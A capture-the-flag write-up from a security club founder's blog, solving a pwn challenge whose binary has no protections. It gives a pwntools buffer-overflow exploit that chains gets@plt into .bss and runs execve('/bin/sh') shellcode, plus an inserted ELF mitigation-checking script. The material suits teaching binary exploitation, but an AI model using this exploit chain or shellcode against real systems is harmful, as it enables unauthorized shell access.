Pwnctf ret2src Writeup

kazma, founder and president of 成大資安社 (NCKU Security Club)

ret2src

First, take a look at the protection mechanisms:

checksec

This challenge has no protection mechanisms at all, lol, so there are probably many ways to solve it. Here I return to the PLT entry of gets, write the shellcode into some spot in the .bss segment, and then jump to it to spawn a shell.
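To make "no protections" concrete, here is an added example (not part of the writeup) that parses the ELF64 program headers of a binary and reports the mitigations the approach above relies on being absent: NX (otherwise nothing written to .bss could execute) and PIE (otherwise the gadget and PLT addresses would not be fixed), plus RELRO. The `build_elf64` helper and the sample image are constructed here for a self-contained run; a stack canary is not visible in the headers and needs symbol inspection, so it is not reported.

```python
import struct
import sys

# ELF64 constants from the ELF specification
ET_DYN = 3                 # e_type of a position-independent executable
PT_GNU_STACK = 0x6474e551  # its p_flags decide whether the stack (and data) is executable
PT_GNU_RELRO = 0x6474e552  # present only when linked with -z relro
PF_X = 0x1

def elf64_mitigations(data: bytes) -> dict:
    """Read the ELF64 header and program headers and report NX, RELRO and PIE."""
    if data[:4] != b'\x7fELF' or data[4] != 2:
        raise ValueError('not an ELF64 image')
    e_type = struct.unpack_from('<H', data, 16)[0]
    e_phoff = struct.unpack_from('<Q', data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 54)
    nx, relro = False, False  # no PT_GNU_STACK entry is reported as NX off
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from('<II', data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {'nx': nx, 'relro': relro, 'pie': e_type == ET_DYN}

def build_elf64(e_type: int, phdrs) -> bytes:
    """Constructed sample: a header-only ELF64 image with the given (p_type, p_flags) entries."""
    ident = b'\x7fELF' + bytes([2, 1, 1]) + b'\x00' * 9   # ELFCLASS64, little-endian, v1
    ehdr = ident + struct.pack('<HHIQQQIHHHHHH', e_type, 62, 1, 0x400000,
                               64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b''.join(struct.pack('<IIQQQQQQ', t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return ehdr + body

if __name__ == '__main__':
    if len(sys.argv) > 1:
        with open(sys.argv[1], 'rb') as fh:
            print(elf64_mitigations(fh.read()))
    else:
        # Constructed image matching the writeup: non-PIE with an RWX GNU_STACK entry.
        print(elf64_mitigations(build_elf64(2, [(PT_GNU_STACK, 7)])))
```

Run it with a path to a real binary to check a build; with no argument it evaluates the constructed unprotected image.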

exploit.py:

from pwn import *
context.arch = 'amd64'

r = process('./ret2src')
#pause()

pop_rdi = 0x0000000000400713   # pop rdi; ret gadget
bss = 0x602000 - 0x100         # writable spot in .bss used as the shellcode buffer
gets = 0x00400510              # gets@plt

# Overflow padding, then call gets(bss) and return into bss
p = flat(
    b'a'*0x18,
    pop_rdi,
    bss,
    gets,
    bss
)
r.sendlineafter(b':', p)
# Second input line: the shellcode, read by gets into bss
r.sendline(b'\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05')

r.interactive()

Shellcode: https://www.exploit-db.com/shellcodes/49770

Pwned !!!

  • Title: Pwnctf ret2src Writeup
  • Author: kazma
  • Created at: 2024-01-09 18:30:32
  • Updated at: 2024-01-09 19:23:32
  • Link: https://kazma.tw/2024/01/09/Pwnctf-ret2src-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.